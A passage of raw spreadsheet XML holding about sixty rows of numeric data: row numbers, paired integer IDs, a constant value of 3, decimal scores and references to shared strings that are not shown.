    <row r="5970" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5970" s="1">
        <v>5968</v>
      </c>
      <c r="B5970">
        <v>2196</v>
      </c>
      <c r="C5970">
        <v>2196</v>
      </c>
      <c r="D5970">
        <v>3</v>
      </c>
      <c r="E5970">
        <v>0.92019999027252197</v>
      </c>
      <c r="F5970" t="s">
        <v>10120</v>
      </c>
      <c r="G5970" t="s">
        <v>11810</v>
      </c>
      <c r="H5970" t="s">
        <v>11811</v>
      </c>
    </row>
    <row r="5971" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5971" s="1">
        <v>5969</v>
      </c>
      <c r="B5971">
        <v>2198</v>
      </c>
      <c r="C5971">
        <v>2198</v>
      </c>
      <c r="D5971">
        <v>3</v>
      </c>
      <c r="E5971">
        <v>0.4918999969959259</v>
      </c>
      <c r="F5971" t="s">
        <v>10120</v>
      </c>
      <c r="G5971" t="s">
        <v>11812</v>
      </c>
      <c r="H5971" t="s">
        <v>11813</v>
      </c>
    </row>
    <row r="5972" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5972" s="1">
        <v>5970</v>
      </c>
      <c r="B5972">
        <v>2204</v>
      </c>
      <c r="C5972">
        <v>2204</v>
      </c>
      <c r="D5972">
        <v>3</v>
      </c>
      <c r="E5972">
        <v>0.51639997959136963</v>
      </c>
      <c r="F5972" t="s">
        <v>10120</v>
      </c>
      <c r="G5972" t="s">
        <v>11814</v>
      </c>
      <c r="H5972" t="s">
        <v>11815</v>
      </c>
    </row>
    <row r="5973" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5973" s="1">
        <v>5971</v>
      </c>
      <c r="B5973">
        <v>2205</v>
      </c>
      <c r="C5973">
        <v>2205</v>
      </c>
      <c r="D5973">
        <v>3</v>
      </c>
      <c r="E5973">
        <v>0.63929998874664307</v>
      </c>
      <c r="F5973" t="s">
        <v>10120</v>
      </c>
      <c r="G5973" t="s">
        <v>11816</v>
      </c>
      <c r="H5973" t="s">
        <v>11817</v>
      </c>
    </row>
    <row r="5974" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5974" s="1">
        <v>5972</v>
      </c>
      <c r="B5974">
        <v>2210</v>
      </c>
      <c r="C5974">
        <v>2210</v>
      </c>
      <c r="D5974">
        <v>3</v>
      </c>
      <c r="E5974">
        <v>0.92839998006820679</v>
      </c>
      <c r="F5974" t="s">
        <v>10120</v>
      </c>
      <c r="G5974" t="s">
        <v>11818</v>
      </c>
      <c r="H5974" t="s">
        <v>11819</v>
      </c>
    </row>
    <row r="5975" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5975" s="1">
        <v>5973</v>
      </c>
      <c r="B5975">
        <v>1402</v>
      </c>
      <c r="C5975">
        <v>1402</v>
      </c>
      <c r="D5975">
        <v>3</v>
      </c>
      <c r="E5975">
        <v>0.77100002765655518</v>
      </c>
      <c r="F5975" t="s">
        <v>10120</v>
      </c>
      <c r="G5975" t="s">
        <v>11820</v>
      </c>
      <c r="H5975" t="s">
        <v>11821</v>
      </c>
    </row>
    <row r="5976" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5976" s="1">
        <v>5974</v>
      </c>
      <c r="B5976">
        <v>2214</v>
      </c>
      <c r="C5976">
        <v>2214</v>
      </c>
      <c r="D5976">
        <v>3</v>
      </c>
      <c r="E5976">
        <v>0.81709998846054077</v>
      </c>
      <c r="F5976" t="s">
        <v>10120</v>
      </c>
      <c r="G5976" t="s">
        <v>11822</v>
      </c>
      <c r="H5976" t="s">
        <v>11823</v>
      </c>
    </row>
    <row r="5977" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5977" s="1">
        <v>5975</v>
      </c>
      <c r="B5977">
        <v>2174</v>
      </c>
      <c r="C5977">
        <v>2174</v>
      </c>
      <c r="D5977">
        <v>3</v>
      </c>
      <c r="E5977">
        <v>0.86250001192092896</v>
      </c>
      <c r="F5977" t="s">
        <v>10120</v>
      </c>
      <c r="G5977" t="s">
        <v>11824</v>
      </c>
      <c r="H5977" t="s">
        <v>11825</v>
      </c>
    </row>
    <row r="5978" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5978" s="1">
        <v>5976</v>
      </c>
      <c r="B5978">
        <v>2138</v>
      </c>
      <c r="C5978">
        <v>2138</v>
      </c>
      <c r="D5978">
        <v>3</v>
      </c>
      <c r="E5978">
        <v>0.64639997482299805</v>
      </c>
      <c r="F5978" t="s">
        <v>10120</v>
      </c>
      <c r="G5978" t="s">
        <v>11826</v>
      </c>
      <c r="H5978" t="s">
        <v>11827</v>
      </c>
    </row>
    <row r="5979" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5979" s="1">
        <v>5977</v>
      </c>
      <c r="B5979">
        <v>2173</v>
      </c>
      <c r="C5979">
        <v>2173</v>
      </c>
      <c r="D5979">
        <v>3</v>
      </c>
      <c r="E5979">
        <v>0.62889999151229858</v>
      </c>
      <c r="F5979" t="s">
        <v>10120</v>
      </c>
      <c r="G5979" t="s">
        <v>11828</v>
      </c>
      <c r="H5979" t="s">
        <v>11829</v>
      </c>
    </row>
    <row r="5980" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5980" s="1">
        <v>5978</v>
      </c>
      <c r="B5980">
        <v>2170</v>
      </c>
      <c r="C5980">
        <v>2170</v>
      </c>
      <c r="D5980">
        <v>3</v>
      </c>
      <c r="E5980">
        <v>0.82130002975463867</v>
      </c>
      <c r="F5980" t="s">
        <v>10120</v>
      </c>
      <c r="G5980" t="s">
        <v>11830</v>
      </c>
      <c r="H5980" t="s">
        <v>11831</v>
      </c>
    </row>
    <row r="5981" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5981" s="1">
        <v>5979</v>
      </c>
      <c r="B5981">
        <v>2140</v>
      </c>
      <c r="C5981">
        <v>2140</v>
      </c>
      <c r="D5981">
        <v>3</v>
      </c>
      <c r="E5981">
        <v>0.55889999866485596</v>
      </c>
      <c r="F5981" t="s">
        <v>10120</v>
      </c>
      <c r="G5981" t="s">
        <v>11832</v>
      </c>
      <c r="H5981" t="s">
        <v>11833</v>
      </c>
    </row>
    <row r="5982" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5982" s="1">
        <v>5980</v>
      </c>
      <c r="B5982">
        <v>1464</v>
      </c>
      <c r="C5982">
        <v>1464</v>
      </c>
      <c r="D5982">
        <v>3</v>
      </c>
      <c r="E5982">
        <v>0.75269997119903564</v>
      </c>
      <c r="F5982" t="s">
        <v>10120</v>
      </c>
      <c r="G5982" t="s">
        <v>11834</v>
      </c>
      <c r="H5982" t="s">
        <v>11835</v>
      </c>
    </row>
    <row r="5983" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5983" s="1">
        <v>5981</v>
      </c>
      <c r="B5983">
        <v>2143</v>
      </c>
      <c r="C5983">
        <v>2143</v>
      </c>
      <c r="D5983">
        <v>3</v>
      </c>
      <c r="E5983">
        <v>0.4578000009059906</v>
      </c>
      <c r="F5983" t="s">
        <v>10120</v>
      </c>
      <c r="G5983" t="s">
        <v>11836</v>
      </c>
      <c r="H5983" t="s">
        <v>11837</v>
      </c>
    </row>
    <row r="5984" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5984" s="1">
        <v>5982</v>
      </c>
      <c r="B5984">
        <v>2144</v>
      </c>
      <c r="C5984">
        <v>2144</v>
      </c>
      <c r="D5984">
        <v>3</v>
      </c>
      <c r="E5984">
        <v>0.75499999523162842</v>
      </c>
      <c r="F5984" t="s">
        <v>10120</v>
      </c>
      <c r="G5984" t="s">
        <v>11838</v>
      </c>
      <c r="H5984" t="s">
        <v>11839</v>
      </c>
    </row>
    <row r="5985" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5985" s="1">
        <v>5983</v>
      </c>
      <c r="B5985">
        <v>2145</v>
      </c>
      <c r="C5985">
        <v>2145</v>
      </c>
      <c r="D5985">
        <v>3</v>
      </c>
      <c r="E5985">
        <v>0.58910000324249268</v>
      </c>
      <c r="F5985" t="s">
        <v>10120</v>
      </c>
      <c r="G5985" t="s">
        <v>11840</v>
      </c>
      <c r="H5985" t="s">
        <v>11841</v>
      </c>
    </row>
    <row r="5986" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5986" s="1">
        <v>5984</v>
      </c>
      <c r="B5986">
        <v>1459</v>
      </c>
      <c r="C5986">
        <v>1459</v>
      </c>
      <c r="D5986">
        <v>3</v>
      </c>
      <c r="E5986">
        <v>0.5</v>
      </c>
      <c r="F5986" t="s">
        <v>10120</v>
      </c>
      <c r="G5986" t="s">
        <v>11842</v>
      </c>
      <c r="H5986" t="s">
        <v>11843</v>
      </c>
    </row>
    <row r="5987" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5987" s="1">
        <v>5985</v>
      </c>
      <c r="B5987">
        <v>1456</v>
      </c>
      <c r="C5987">
        <v>1456</v>
      </c>
      <c r="D5987">
        <v>3</v>
      </c>
      <c r="E5987">
        <v>0.96429997682571411</v>
      </c>
      <c r="F5987" t="s">
        <v>10120</v>
      </c>
      <c r="G5987" t="s">
        <v>11844</v>
      </c>
      <c r="H5987" t="s">
        <v>11845</v>
      </c>
    </row>
    <row r="5988" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5988" s="1">
        <v>5986</v>
      </c>
      <c r="B5988">
        <v>1447</v>
      </c>
      <c r="C5988">
        <v>1447</v>
      </c>
      <c r="D5988">
        <v>3</v>
      </c>
      <c r="E5988">
        <v>0.99699997901916504</v>
      </c>
      <c r="F5988" t="s">
        <v>10120</v>
      </c>
      <c r="G5988" t="s">
        <v>11846</v>
      </c>
      <c r="H5988" t="s">
        <v>11847</v>
      </c>
    </row>
    <row r="5989" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5989" s="1">
        <v>5987</v>
      </c>
      <c r="B5989">
        <v>2151</v>
      </c>
      <c r="C5989">
        <v>2151</v>
      </c>
      <c r="D5989">
        <v>3</v>
      </c>
      <c r="E5989">
        <v>0.51789999008178711</v>
      </c>
      <c r="F5989" t="s">
        <v>10120</v>
      </c>
      <c r="G5989" t="s">
        <v>11848</v>
      </c>
      <c r="H5989" t="s">
        <v>11849</v>
      </c>
    </row>
    <row r="5990" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5990" s="1">
        <v>5988</v>
      </c>
      <c r="B5990">
        <v>2154</v>
      </c>
      <c r="C5990">
        <v>2154</v>
      </c>
      <c r="D5990">
        <v>3</v>
      </c>
      <c r="E5990">
        <v>0.75629997253417969</v>
      </c>
      <c r="F5990" t="s">
        <v>10120</v>
      </c>
      <c r="G5990" t="s">
        <v>11850</v>
      </c>
      <c r="H5990" t="s">
        <v>11851</v>
      </c>
    </row>
    <row r="5991" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5991" s="1">
        <v>5989</v>
      </c>
      <c r="B5991">
        <v>1442</v>
      </c>
      <c r="C5991">
        <v>1442</v>
      </c>
      <c r="D5991">
        <v>3</v>
      </c>
      <c r="E5991">
        <v>0.51569998264312744</v>
      </c>
      <c r="F5991" t="s">
        <v>10120</v>
      </c>
      <c r="G5991" t="s">
        <v>11852</v>
      </c>
      <c r="H5991" t="s">
        <v>11853</v>
      </c>
    </row>
    <row r="5992" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5992" s="1">
        <v>5990</v>
      </c>
      <c r="B5992">
        <v>2156</v>
      </c>
      <c r="C5992">
        <v>2156</v>
      </c>
      <c r="D5992">
        <v>3</v>
      </c>
      <c r="E5992">
        <v>0.98320001363754272</v>
      </c>
      <c r="F5992" t="s">
        <v>10120</v>
      </c>
      <c r="G5992" t="s">
        <v>11854</v>
      </c>
      <c r="H5992" t="s">
        <v>11855</v>
      </c>
    </row>
    <row r="5993" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5993" s="1">
        <v>5991</v>
      </c>
      <c r="B5993">
        <v>1438</v>
      </c>
      <c r="C5993">
        <v>1438</v>
      </c>
      <c r="D5993">
        <v>3</v>
      </c>
      <c r="E5993">
        <v>0.39070001244544977</v>
      </c>
      <c r="F5993" t="s">
        <v>10120</v>
      </c>
      <c r="G5993" t="s">
        <v>11856</v>
      </c>
      <c r="H5993" t="s">
        <v>11857</v>
      </c>
    </row>
    <row r="5994" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5994" s="1">
        <v>5992</v>
      </c>
      <c r="B5994">
        <v>1437</v>
      </c>
      <c r="C5994">
        <v>1437</v>
      </c>
      <c r="D5994">
        <v>3</v>
      </c>
      <c r="E5994">
        <v>0.54360002279281616</v>
      </c>
      <c r="F5994" t="s">
        <v>10120</v>
      </c>
      <c r="G5994" t="s">
        <v>11858</v>
      </c>
      <c r="H5994" t="s">
        <v>11859</v>
      </c>
    </row>
    <row r="5995" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5995" s="1">
        <v>5993</v>
      </c>
      <c r="B5995">
        <v>1436</v>
      </c>
      <c r="C5995">
        <v>1436</v>
      </c>
      <c r="D5995">
        <v>3</v>
      </c>
      <c r="E5995">
        <v>0.77399998903274536</v>
      </c>
      <c r="F5995" t="s">
        <v>10120</v>
      </c>
      <c r="G5995" t="s">
        <v>11860</v>
      </c>
      <c r="H5995" t="s">
        <v>11861</v>
      </c>
    </row>
    <row r="5996" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5996" s="1">
        <v>5994</v>
      </c>
      <c r="B5996">
        <v>2166</v>
      </c>
      <c r="C5996">
        <v>2166</v>
      </c>
      <c r="D5996">
        <v>3</v>
      </c>
      <c r="E5996">
        <v>0.55049997568130493</v>
      </c>
      <c r="F5996" t="s">
        <v>10120</v>
      </c>
      <c r="G5996" t="s">
        <v>11862</v>
      </c>
      <c r="H5996" t="s">
        <v>11863</v>
      </c>
    </row>
    <row r="5997" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5997" s="1">
        <v>5995</v>
      </c>
      <c r="B5997">
        <v>2169</v>
      </c>
      <c r="C5997">
        <v>2169</v>
      </c>
      <c r="D5997">
        <v>3</v>
      </c>
      <c r="E5997">
        <v>0.866100013256073</v>
      </c>
      <c r="F5997" t="s">
        <v>10120</v>
      </c>
      <c r="G5997" t="s">
        <v>11864</v>
      </c>
      <c r="H5997" t="s">
        <v>11865</v>
      </c>
    </row>
    <row r="5998" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5998" s="1">
        <v>5996</v>
      </c>
      <c r="B5998">
        <v>2172</v>
      </c>
      <c r="C5998">
        <v>2172</v>
      </c>
      <c r="D5998">
        <v>3</v>
      </c>
      <c r="E5998">
        <v>0.59210002422332764</v>
      </c>
      <c r="F5998" t="s">
        <v>10120</v>
      </c>
      <c r="G5998" t="s">
        <v>11866</v>
      </c>
      <c r="H5998" t="s">
        <v>11867</v>
      </c>
    </row>
    <row r="5999" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5999" s="1">
        <v>5997</v>
      </c>
      <c r="B5999">
        <v>1545</v>
      </c>
      <c r="C5999">
        <v>1545</v>
      </c>
      <c r="D5999">
        <v>3</v>
      </c>
      <c r="E5999">
        <v>0.41830000281333918</v>
      </c>
      <c r="F5999" t="s">
        <v>10120</v>
      </c>
      <c r="G5999" t="s">
        <v>11868</v>
      </c>
      <c r="H5999" t="s">
        <v>11869</v>
      </c>
    </row>
    <row r="6000" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6000" s="1">
        <v>5998</v>
      </c>
      <c r="B6000">
        <v>2007</v>
      </c>
      <c r="C6000">
        <v>2007</v>
      </c>
      <c r="D6000">
        <v>3</v>
      </c>
      <c r="E6000">
        <v>0.71429997682571411</v>
      </c>
      <c r="F6000" t="s">
        <v>10120</v>
      </c>
      <c r="G6000" t="s">
        <v>11870</v>
      </c>
      <c r="H6000" t="s">
        <v>11871</v>
      </c>
    </row>
    <row r="6001" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6001" s="1">
        <v>5999</v>
      </c>
      <c r="B6001">
        <v>2006</v>
      </c>
      <c r="C6001">
        <v>2006</v>
      </c>
      <c r="D6001">
        <v>3</v>
      </c>
      <c r="E6001">
        <v>0.66759997606277466</v>
      </c>
      <c r="F6001" t="s">
        <v>10120</v>
      </c>
      <c r="G6001" t="s">
        <v>11872</v>
      </c>
      <c r="H6001" t="s">
        <v>11873</v>
      </c>
    </row>
    <row r="6002" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6002" s="1">
        <v>6000</v>
      </c>
      <c r="B6002">
        <v>1777</v>
      </c>
      <c r="C6002">
        <v>1777</v>
      </c>
      <c r="D6002">
        <v>3</v>
      </c>
      <c r="E6002">
        <v>0.42460000514984131</v>
      </c>
      <c r="F6002" t="s">
        <v>10120</v>
      </c>
      <c r="G6002" t="s">
        <v>11874</v>
      </c>
      <c r="H6002" t="s">
        <v>11875</v>
      </c>
    </row>
    <row r="6003" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6003" s="1">
        <v>6001</v>
      </c>
      <c r="B6003">
        <v>1781</v>
      </c>
      <c r="C6003">
        <v>1781</v>
      </c>
      <c r="D6003">
        <v>3</v>
      </c>
      <c r="E6003">
        <v>0.33100000023841858</v>
      </c>
      <c r="F6003" t="s">
        <v>10120</v>
      </c>
      <c r="G6003" t="s">
        <v>11876</v>
      </c>
      <c r="H6003" t="s">
        <v>11877</v>
      </c>
    </row>
    <row r="6004" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6004" s="1">
        <v>6002</v>
      </c>
      <c r="B6004">
        <v>1784</v>
      </c>
      <c r="C6004">
        <v>1784</v>
      </c>
      <c r="D6004">
        <v>3</v>
      </c>
      <c r="E6004">
        <v>0.39500001072883612</v>
      </c>
      <c r="F6004" t="s">
        <v>10120</v>
      </c>
      <c r="G6004" t="s">
        <v>11878</v>
      </c>
      <c r="H6004" t="s">
        <v>11879</v>
      </c>
    </row>
    <row r="6005" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6005" s="1">
        <v>6003</v>
      </c>
      <c r="B6005">
        <v>1786</v>
      </c>
      <c r="C6005">
        <v>1786</v>
      </c>
      <c r="D6005">
        <v>3</v>
      </c>
      <c r="E6005">
        <v>0.45519998669624329</v>
      </c>
      <c r="F6005" t="s">
        <v>10120</v>
      </c>
      <c r="G6005" t="s">
        <v>11880</v>
      </c>
      <c r="H6005" t="s">
        <v>11881</v>
      </c>
    </row>
    <row r="6006" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6006" s="1">
        <v>6004</v>
      </c>
      <c r="B6006">
        <v>1788</v>
      </c>
      <c r="C6006">
        <v>1788</v>
      </c>
      <c r="D6006">
        <v>3</v>
      </c>
      <c r="E6006">
        <v>0.64730000495910645</v>
      </c>
      <c r="F6006" t="s">
        <v>10120</v>
      </c>
      <c r="G6006" t="s">
        <v>11882</v>
      </c>
      <c r="H6006" t="s">
        <v>11883</v>
      </c>
    </row>
    <row r="6007" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6007" s="1">
        <v>6005</v>
      </c>
      <c r="B6007">
        <v>1789</v>
      </c>
      <c r="C6007">
        <v>1789</v>
      </c>
      <c r="D6007">
        <v>3</v>
      </c>
      <c r="E6007">
        <v>0.4343000054359436</v>
      </c>
      <c r="F6007" t="s">
        <v>10120</v>
      </c>
      <c r="G6007" t="s">
        <v>11884</v>
      </c>
      <c r="H6007" t="s">
        <v>11885</v>
      </c>
    </row>
    <row r="6008" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6008" s="1">
        <v>6006</v>
      </c>
      <c r="B6008">
        <v>1624</v>
      </c>
      <c r="C6008">
        <v>1624</v>
      </c>
      <c r="D6008">
        <v>3</v>
      </c>
      <c r="E6008">
        <v>0.60920000076293945</v>
      </c>
      <c r="F6008" t="s">
        <v>10120</v>
      </c>
      <c r="G6008" t="s">
        <v>11886</v>
      </c>
      <c r="H6008" t="s">
        <v>11887</v>
      </c>
    </row>
    <row r="6009" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6009" s="1">
        <v>6007</v>
      </c>
      <c r="B6009">
        <v>1792</v>
      </c>
      <c r="C6009">
        <v>1792</v>
      </c>
      <c r="D6009">
        <v>3</v>
      </c>
      <c r="E6009">
        <v>0.99720001220703125</v>
      </c>
      <c r="F6009" t="s">
        <v>10120</v>
      </c>
      <c r="G6009" t="s">
        <v>11888</v>
      </c>
      <c r="H6009" t="s">
        <v>11889</v>
      </c>
    </row>
    <row r="6010" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6010" s="1">
        <v>6008</v>
      </c>
      <c r="B6010">
        <v>1793</v>
      </c>
      <c r="C6010">
        <v>1793</v>
      </c>
      <c r="D6010">
        <v>3</v>
      </c>
      <c r="E6010">
        <v>0.41159999370574951</v>
      </c>
      <c r="F6010" t="s">
        <v>10120</v>
      </c>
      <c r="G6010" t="s">
        <v>11890</v>
      </c>
      <c r="H6010" t="s">
        <v>11891</v>
      </c>
    </row>
    <row r="6011" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6011" s="1">
        <v>6009</v>
      </c>
      <c r="B6011">
        <v>1623</v>
      </c>
      <c r="C6011">
        <v>1623</v>
      </c>
      <c r="D6011">
        <v>3</v>
      </c>
      <c r="E6011">
        <v>0.75819998979568481</v>
      </c>
      <c r="F6011" t="s">
        <v>10120</v>
      </c>
      <c r="G6011" t="s">
        <v>11892</v>
      </c>
      <c r="H6011" t="s">
        <v>11893</v>
      </c>
    </row>
    <row r="6012" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6012" s="1">
        <v>6010</v>
      </c>
      <c r="B6012">
        <v>1622</v>
      </c>
      <c r="C6012">
        <v>1622</v>
      </c>
      <c r="D6012">
        <v>3</v>
      </c>
      <c r="E6012">
        <v>0.76059997081756592</v>
      </c>
      <c r="F6012" t="s">
        <v>10120</v>
      </c>
      <c r="G6012" t="s">
        <v>11894</v>
      </c>
      <c r="H6012" t="s">
        <v>11476</v>
      </c>
    </row>
    <row r="6013" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6013" s="1">
        <v>6011</v>
      </c>
      <c r="B6013">
        <v>1621</v>
      </c>
      <c r="C6013">
        <v>1621</v>
      </c>
      <c r="D6013">
        <v>3</v>
      </c>
      <c r="E6013">
        <v>0.99889999628067017</v>
      </c>
      <c r="F6013" t="s">
        <v>10120</v>
      </c>
      <c r="G6013" t="s">
        <v>11895</v>
      </c>
      <c r="H6013" t="s">
        <v>11530</v>
      </c>
    </row>
    <row r="6014" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6014" s="1">
        <v>6012</v>
      </c>
      <c r="B6014">
        <v>1620</v>
      </c>
      <c r="C6014">
        <v>1620</v>
      </c>
      <c r="D6014">
        <v>3</v>
      </c>
      <c r="E6014">
        <v>0.99940001964569092</v>
      </c>
      <c r="F6014" t="s">
        <v>10120</v>
      </c>
      <c r="G6014" t="s">
        <v>11896</v>
      </c>
      <c r="H6014" t="s">
        <v>11897</v>
      </c>
    </row>
    <row r="6015" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6015" s="1">
        <v>6013</v>
      </c>
      <c r="B6015">
        <v>1619</v>
      </c>
      <c r="C6015">
        <v>1619</v>
      </c>
      <c r="D6015">
        <v>3</v>
      </c>
      <c r="E6015">
        <v>0.99949997663497925</v>
      </c>
      <c r="F6015" t="s">
        <v>10120</v>
      </c>
      <c r="G6015" t="s">
        <v>11898</v>
      </c>
      <c r="H6015" t="s">
        <v>11899</v>
      </c>
    </row>
    <row r="6016" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6016" s="1">
        <v>6014</v>
      </c>
      <c r="B6016">
        <v>1822</v>
      </c>
      <c r="C6016">
        <v>1822</v>
      </c>
      <c r="D6016">
        <v>3</v>
      </c>
      <c r="E6016">
        <v>0.68819999694824219</v>
      </c>
      <c r="F6016" t="s">
        <v>10120</v>
      </c>
      <c r="G6016" t="s">
        <v>11900</v>
      </c>
      <c r="H6016" t="s">
        <v>11901</v>
      </c>
    </row>
    <row r="6017" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6017" s="1">
        <v>6015</v>
      </c>
      <c r="B6017">
        <v>1618</v>
      </c>
      <c r="C6017">
        <v>1618</v>
      </c>
      <c r="D6017">
        <v>3</v>
      </c>
      <c r="E6017">
        <v>0.58020001649856567</v>
      </c>
      <c r="F6017" t="s">
        <v>10120</v>
      </c>
      <c r="G6017" t="s">
        <v>11902</v>
      </c>
      <c r="H6017" t="s">
        <v>11903</v>
      </c>
    </row>
    <row r="6018" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6018" s="1">
        <v>6016</v>
      </c>
      <c r="B6018">
        <v>1617</v>
      </c>
      <c r="C6018">
        <v>1617</v>
      </c>
      <c r="D6018">
        <v>3</v>
      </c>
      <c r="E6018">
        <v>0.4221000075340271</v>
      </c>
      <c r="F6018" t="s">
        <v>10120</v>
      </c>
      <c r="G6018" t="s">
        <v>11904</v>
      </c>
      <c r="H6018" t="s">
        <v>11905</v>
      </c>
    </row>
    <row r="6019" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6019" s="1">
        <v>6017</v>
      </c>
      <c r="B6019">
        <v>1775</v>
      </c>
      <c r="C6019">
        <v>1775</v>
      </c>
      <c r="D6019">
        <v>3</v>
      </c>
      <c r="E6019">
        <v>0.62510001659393311</v>
      </c>
      <c r="F6019" t="s">
        <v>10120</v>
      </c>
      <c r="G6019" t="s">
        <v>11906</v>
      </c>
      <c r="H6019" t="s">
        <v>11907</v>
      </c>
    </row>
    <row r="6020" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6020" s="1">
        <v>6018</v>
      </c>
      <c r="B6020">
        <v>1828</v>
      </c>
      <c r="C6020">
        <v>1828</v>
      </c>
      <c r="D6020">
        <v>3</v>
      </c>
      <c r="E6020">
        <v>0.69889998435974121</v>
      </c>
      <c r="F6020" t="s">
        <v>10120</v>
      </c>
      <c r="G6020" t="s">
        <v>11908</v>
      </c>
      <c r="H6020" t="s">
        <v>11909</v>
      </c>
    </row>
    <row r="6021" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6021" s="1">
        <v>6019</v>
      </c>
      <c r="B6021">
        <v>1636</v>
      </c>
      <c r="C6021">
        <v>1636</v>
      </c>
      <c r="D6021">
        <v>3</v>
      </c>
      <c r="E6021">
        <v>0.48330000042915339</v>
      </c>
      <c r="F6021" t="s">
        <v>10120</v>
      </c>
      <c r="G6021" t="s">
        <v>11910</v>
      </c>
      <c r="H6021" t="s">
        <v>11911</v>
      </c>
    </row>
    <row r="6022" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6022" s="1">
        <v>6020</v>
      </c>
      <c r="B6022">
        <v>1762</v>
      </c>
      <c r="C6022">
        <v>1762</v>
      </c>
      <c r="D6022">
        <v>3</v>
      </c>
      <c r="E6022">
        <v>0.84909999370574951</v>
      </c>
      <c r="F6022" t="s">
        <v>10120</v>
      </c>
      <c r="G6022" t="s">
        <v>11912</v>
      </c>
      <c r="H6022" t="s">
        <v>11913</v>
      </c>
    </row>
    <row r="6023" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6023" s="1">
        <v>6021</v>
      </c>
      <c r="B6023">
        <v>1659</v>
      </c>
      <c r="C6023">
        <v>1659</v>
      </c>
      <c r="D6023">
        <v>3</v>
      </c>
      <c r="E6023">
        <v>0.55970001220703125</v>
      </c>
      <c r="F6023" t="s">
        <v>10120</v>
      </c>
      <c r="G6023" t="s">
        <v>11914</v>
      </c>
      <c r="H6023" t="s">
        <v>11915</v>
      </c>
    </row>
    <row r="6024" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6024" s="1">
        <v>6022</v>
      </c>
      <c r="B6024">
        <v>1667</v>
      </c>
      <c r="C6024">
        <v>1667</v>
      </c>
      <c r="D6024">
        <v>3</v>
      </c>
      <c r="E6024">
        <v>0.80549997091293335</v>
      </c>
      <c r="F6024" t="s">
        <v>10120</v>
      </c>
      <c r="G6024" t="s">
        <v>11916</v>
      </c>
      <c r="H6024" t="s">
        <v>11917</v>
      </c>
    </row>
    <row r="6025" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6025" s="1">
        <v>6023</v>
      </c>
      <c r="B6025">
        <v>1668</v>
      </c>
      <c r="C6025">
        <v>1668</v>
      </c>
      <c r="D6025">
        <v>3</v>
      </c>
      <c r="E6025">
        <v>0.59310001134872437</v>
      </c>
      <c r="F6025" t="s">
        <v>10120</v>
      </c>
      <c r="G6025" t="s">
        <v>11918</v>
      </c>
      <c r="H6025" t="s">
        <v>11919</v>
      </c>
    </row>
    <row r="6026" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6026" s="1">
        <v>6024</v>
      </c>
      <c r="B6026">
        <v>1673</v>
      </c>
      <c r="C6026">
        <v>1673</v>
      </c>
      <c r="D6026">
        <v>3</v>
      </c>
      <c r="E6026">
        <v>0.56430000066757202</v>
      </c>
      <c r="F6026" t="s">
        <v>10120</v>
      </c>
      <c r="G6026" t="s">
        <v>11920</v>
      </c>
      <c r="H6026" t="s">
        <v>11921</v>
      </c>
    </row>
    <row r="6027" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6027" s="1">
        <v>6025</v>
      </c>
      <c r="B6027">
        <v>1655</v>
      </c>
      <c r="C6027">
        <v>1655</v>
      </c>
      <c r="D6027">
        <v>3</v>
      </c>
      <c r="E6027">
        <v>0.56279999017715454</v>
      </c>
      <c r="F6027" t="s">
        <v>10120</v>
      </c>
      <c r="G6027" t="s">
        <v>11922</v>
      </c>
      <c r="H6027" t="s">
        <v>11923</v>
      </c>
    </row>
    <row r="6028" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6028" s="1">
        <v>6026</v>
      </c>
      <c r="B6028">
        <v>1689</v>
      </c>
      <c r="C6028">
